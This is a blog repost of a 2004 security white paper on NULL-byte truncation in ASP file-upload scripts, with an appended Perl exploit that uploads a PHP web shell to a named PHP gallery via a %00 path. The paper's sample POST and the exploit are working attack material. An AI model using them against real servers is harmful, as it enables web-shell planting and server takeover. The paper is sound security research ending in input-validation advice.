0x00 vs ASP file upload scripts

原创 2004年07月21日 21:34:00

Copyright Security-Assessment.com Ltd 2004
White Paper
Title: 0x00 vs ASP file upload scripts
Prepared by: Brett Moore
Network Intrusion Specialist
Security-Assessment.com
Date: 13 July 2004
13/07/2004 Page 2 of 7
Copyright Security-Assessment.com Ltd 2004
Abstract
The affects of the `Poison NULL byte` have not been widely explored in ASP, but
as with other languages the NULL byte can cause problems when ASP passes
data to objects.
Many upload systems written in ASP suffer from a common problem whereby a
NULL byte can be inserted into the filename parameter leading to any extension,
after the null byte, being ignored when writing the file.
This means that in some cases it is possible to bypass checks for valid
extensions, even if one is appended by the application.
This is very similar to attacks against perl and PHP, the difference being how the
null byte is sent to the application.
This problem arises when data is compared and validated in ASP script but
passed to the FileSystemObject without checking for NULL bytes.
This document will discuss how ASP upload scripts can be affected by the Poison
NULL byte attack.
Scope
The information in this document is based on research done using upload
systems that incorporate multipart/form-data posts and the
Scripting.FileSystemObject object.
Throughout this document we focus on the CreateTextFile method, which is used
to create a file for writing, but it is possible that other objects functions are
vulnerable to the same type of problem.
A %00 or NULL can not be sent through the URL or a normal form post as the
web server registers this as the end of the string, but does not store it in the
filename variable.
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.
File Uploading
File uploading is commonly done using an input object of type file and an
encoding type of multipart/form-data.
The content type "application/x-www-form-urlencoded" is inefficient for sending
large quantities of binary data or text containing non-ASCII characters. The
13/07/2004 Page 3 of 7
Copyright Security-Assessment.com Ltd 2004
content type "multipart/form-data" should be used for submitting forms that
contain files, non-ASCII data, and binary data.
A "multipart/form-data" message contains a series of parts, each representing a
successful control. The parts are sent to the processing agent in the same order
the corresponding controls appear in the document stream.


Your Picture:





When submitted the forms data will be sent in the multipart/form-data format. This
allows for the transfer of all bytes, including nulls, within the forms posted data.
Upon receiving the post, the target ASP page needs to process and decode the
posted data into a useable state.


File Saving
At some point in the uploading process, the file will be saved to a file location. The
following is some commonly used code to do this.
Public Sub Save(filename)
Dim objFSO, objFSOFile
path=server.MapPath(“/uploads/”)
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objFSOFile = objFSO.CreateTextFile(path + "/" + filename)
objFSOFile.Write
objFSOFile.Close
End Sub
When the filename parameter is passed to the CreateTextFile() function, it may
contain NULL bytes. This can affect the name of the created file as the
CreateTextFile only reads up to the NULL byte when creating the file.
Set objFSOFile = objFSO.CreateTextFile(path + "/" + filename)
If filename contains a NULL byte, anything after that byte will be ignored.

Null Byte
The NULL byte can be inserted manually through modifications to the multipart
post data using a hex editor, or by using a web proxy.
Multipart Form Post
POST /upload.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------
7d4cb161b009c
Host: localhost
Content-Length: 359
Pragma: no-cache
Cookie: ASPSESSIONIDSAADRCRS=LAKNNAKAGMIBJCOOLBIFEHIK
-----------------------------7d4cb161b009c
Content-Disposition: form-data; name="YourFile"; filename="c:/nc.exe .bmp"
Content-Type: text/plain
Proof Of Upload Test File
brett.moore@security-assessment.com
-----------------------------7d4cb161b009c
Content-Disposition: form-data; name="submit"
Upload
-----------------------------7d4cb161b009c
The filename parameter of the above post has been changed as such;
N C . E X E (null) . B M P
4E 43 2E 45 58 45 00 2E 42 4D 50
Note that an actual NULL byte (0x00) has been inserted between the .exe and the
.bmp.


Script Tests
The following two file save scripts shown below are examples of upload scripts
where the extension of the written file can be arbitrarily set.
In both cases tFile is the filename parameter passed through the post.


Example One ( File Extension Appending )
Public Sub Save(Path)
Dim objFSO, objFSOFile
Dim lngLoop
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objFSOFile =
objFSO.CreateTextFile(objFSO.BuildPath(Path, tFile + ".bmp"))
‘ Write the file contents
For lngLoop = 1 to LenB(m_Blob)
objFSOFile.Write Chr(AscB(MidB(m_Blob, lngLoop, 1)))
Next
objFSOFile.Close
End Sub
Example Two ( File Extension Checking )
Public Sub Save(Path)
Dim objFSO, objFSOFile
Dim lngLoop
‘ Check the file extension
if right(tFile,4) <> “.bmp” then exit sub
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objFSOFile=
objFSO.CreateTextFile(objFSO.BuildPath(Path, tFile))
‘ Write the file contents
For lngLoop = 1 to LenB(m_Blob)
objFSOFile.Write Chr(AscB(MidB(m_Blob, lngLoop, 1)))
Next
objFSOFile.Close
End Sub
13/07/2004 Page 6 of 7
Copyright Security-Assessment.com Ltd 2004
Final Summary
It has commonly been thought that web applications written in ASP are safe from
the problems associated with NULL bytes. While in most instances this is true, it
can be seen here that applications that make use of objects external to the native
ASP scripting language, can be affected by NULL bytes.
It is probable that other objects and areas can also be manipulated to some extent
when their data is collected through a multipart/form-data post.
As in other areas, proper validation of user input is paramount to the security of
web applications. It is therefore important to check input not only for common
attack strings used for folder traversal, but also for NULL bytes before using the
input in the creation of files.


References
Perl CGI problems - rain.forest.puppy
http://www.phrack.org/show.php?p=55&a=7
Bugtraq Post Regarding PHP and null bytes
http://seclists.org/lists/bugtraq/2003/Jan/0159.html
OWASP HTML Version
http://www.cgisecurity.com/owasp/html/guide.html#id2846281
Forms in HTML documents
http://www.w3.org/TR/REC-html40/interact/forms.html#h-17.13.4
Security-Assessment.com
www.security-assessment.com

PHP程序有指定PATH时,在PATH文件后门加入%00可以上传任意文件.

测试程序:NEATPIC PHP目录直读版 1.2.3

http://web.cncode.com/SoftView.asp?SoftID=1820

一个漏洞利用程序:
!/usr/bin/perl
$| = 1;
use Socket;
$host = "127.0.0.1";
$port = "80";

$UploadTo = "";
$str =
"-----------------------------7d41f4a600472/r/n".
"Content-Disposition: form-data; name=/"path/"/r/n".
"/r/n".
"www.ppp%00/r/n".
"-----------------------------7d41f4a600472/r/n".
"Content-Disposition: form-data; name=/"image/"; filename=/"F://tools//1.gif/"/r/n".
"Content-Type: text/plain/r/n".
"/r/n".
"<?php/r/n".
"system($c);/r/n".
"?>/r/n".
"-----------------------------7d41f4a600472--/r/n".
"/r/n";

print $str;
$len=length($str);
print $len;

$req ="POST /1/1/3721/index.php?action=upload HTTP/1.1/r/n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*/r/n".
"Referer: http://127.0.0.1/index.php?path=./r/n".
"Accept-Language: zh-cn/r/n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472/r/n".
"Accept-Encoding: gzip, deflate/r/n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)/r/n".
"Host: 127.0.0.1/r/n".
"Content-Length: $len/r/n".
"Connection: Keep-Alive/r/n".
"Cache-Control: no-cache/r/n".
"Cookie: PHPSESSID=111111111111111111111111/r/n".
"/r/n".
"$str/r/n/r/n";
print $req;
@res = sendraw($req);
print @res;

#Hmm...Maybe you can send it by other way


sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems/n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems/n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        select(S);
    $| = 1;
        print $req;
    my @res = <S>;
        select(STDOUT);
    close(S);
        return @res;
    }
    else {
    die("Can't connect.../n");
    }
}

【ASP】文件上传

由于VBScript这门古老的编程语言并没有像ASP.NET,Servlet、Struts2,PHP等封装好文件上传的方法,绝对不可能一个request.form["file"]就能够拿到文件,因此处...
  • yongh701
  • yongh701
  • 2016年01月20日 17:09
  • 4354

CTF实验吧-上传绕过【0x00截断】

原题内容: bypass the upload 格式:flag{} 解题链接: http://ctf5.shiyanbar.com/web/upload  首先随手上传了一个图片, ...
  • wy_97
  • wy_97
  • 2017年08月01日 18:14
  • 3053

jquery File Upload 插件应用之同时递交form field与多个文件

之前有一文章讨论如何用jquery File Upload(http://blueimp.github.io/jQuery-File-Upload/) 上传文件并取得返回的json对象. http:/...
  • rocklee
  • rocklee
  • 2016年11月19日 15:33
  • 1823

jquery File Upload 插件应用之解析返回json对象

后端用spring mvc+module: Controller: @AuthPassport @RequestMapping("/EAF301L1/upload/{appno}/{rev}")...
  • rocklee
  • rocklee
  • 2016年10月08日 18:01
  • 2910

jQuery File Upload 多文件 单击选中或多选文件直接自动上载 无需提交按钮

jQuery-File-Upload 插件地址:https://github.com/blueimp/jQuery-File-Upload 激活按钮,你可以用  CSS 绘制你喜欢的效果 se...
  • joyous
  • joyous
  • 2016年09月23日 21:13
  • 3579

FileUpload控件文件上传、扩容、限制文件类型及上传验证

首先,文件上传需要使用FileUpload控件,针对于此控件我们来进行一系列的操作。 1、将选中文件上传到目标位置: //获取上传文件的文件名称 string name = File...
  • xianglikai1
  • xianglikai1
  • 2016年07月30日 22:18
  • 1074

jquery-file-upload 文件上传,带进度条

ssssssssssssssssss $('#file_upload').fileupload({ dataType: 'json', url:...
  • ht99582
  • ht99582
  • 2014年11月14日 14:16
  • 3458

rails 不刷新上传文件jquery-fileupload-rails包的简易使用

Gemfile文件: gem 'jquery-fileupload-rails'spplication.js: //= require jquery-fileupload/basic 其实//= re...
  • yc1022
  • yc1022
  • 2014年01月23日 17:41
  • 2321

ASP:FileUpload控件(文件上传控件)

FileUpload控件的主要功能是向指定目录上传文件,该控件包括一个文本框和一个浏览按钮。用户可以在文本框中输入完整的文件路径,或者单击浏览按钮选择需要上传的文件。FileUpload控件不会自动上...
  • vjudge
  • vjudge
  • 2014年07月23日 23:43
  • 1222

asp.net mvc 3.0详细笔记__06__项目文件结构详解_Content和Scripts

1
  • DHCsimida
  • DHCsimida
  • 2013年12月28日 11:31
  • 1103
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:0x00 vs ASP file upload scripts
举报原因:
原因补充:

(最多只允许输入30个字)